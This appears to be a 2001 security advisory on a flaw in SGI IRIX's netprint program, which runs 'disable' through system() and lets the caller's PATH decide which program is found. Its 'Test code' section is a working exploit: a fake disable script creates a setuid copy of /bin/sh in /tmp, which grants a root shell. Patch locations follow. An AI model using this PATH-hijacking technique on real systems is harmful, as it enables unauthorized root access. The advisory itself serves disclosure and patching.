Vulnerability in IRIX netprint DSO

Published: 2001-07-26
Updated: 2001-07-26
Severity: High
Threat level: Local administrator privileges
Error type: Design error
Exploitation mode: Server mode

Affected systems

IRIX 3.x unknown Note 1

Detailed description

/usr/lib/print/netprint is installed by default on all SGI IRIX systems. It contains a vulnerability that allows root privileges to be obtained through an open lp account. The problem is that the netprint program invokes the "disable" command through system(), so, as the test code shows, the command is looked up along the caller's search path.

Test code

    % cat > /tmp/disable
    cp /bin/sh /tmp/lpshell
    chmod 4755 /tmp/lpshell
    ^D
    % set path=(. $path)
    % netprint -n blah -h blah -p blah 1-234
    % /tmp/lpshell

Solution

Download the patch:
http://support.sgi.com/irix/
and
ftp://patches.sgi.com/support/patchset/

The actual patch will be a tar file containing the following files:

    README.patch.4310
    patchSG0004310
    patchSG0004310.idb
    patchSG0004310.print_sw
    README.patch.4311
    patchSG0004311
    patchSG0004311.idb
    patchSG0004311.print_sw